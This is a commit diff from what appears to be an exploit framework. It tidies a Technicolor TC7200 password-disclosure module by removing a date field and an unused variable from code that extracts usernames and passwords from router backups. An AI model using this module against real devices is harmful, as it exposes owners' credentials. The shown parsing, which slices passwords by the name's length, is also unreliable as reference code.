Commit bad86479 by Laurent Meirlaen

TC7200 password disclosure v2 : fix travis build

parent 9fc86f64
...@@ -32,7 +32,6 @@ class Exploit(exploits.Exploit): ...@@ -32,7 +32,6 @@ class Exploit(exploits.Exploit):
'devices': [ 'devices': [
'Technicolor TC7200', 'Technicolor TC7200',
], ],
'disclosure_date': '2016-07-25',
} }
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
...@@ -66,7 +65,6 @@ class Exploit(exploits.Exploit): ...@@ -66,7 +65,6 @@ class Exploit(exploits.Exploit):
nh = struct.unpack('!H', backup[p:p + 2])[0] nh = struct.unpack('!H', backup[p:p + 2])[0]
name = backup[p + 2:p + 2 + nh] name = backup[p + 2:p + 2 + nh]
p += 2 + nh p += 2 + nh
ph = struct.unpack('!H', backup[p:p + 2])[0]
pwd = backup[p + 2:p + 2 + nh] pwd = backup[p + 2:p + 2 + nh]
return name, pwd return name, pwd
return '', '' return '', ''
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment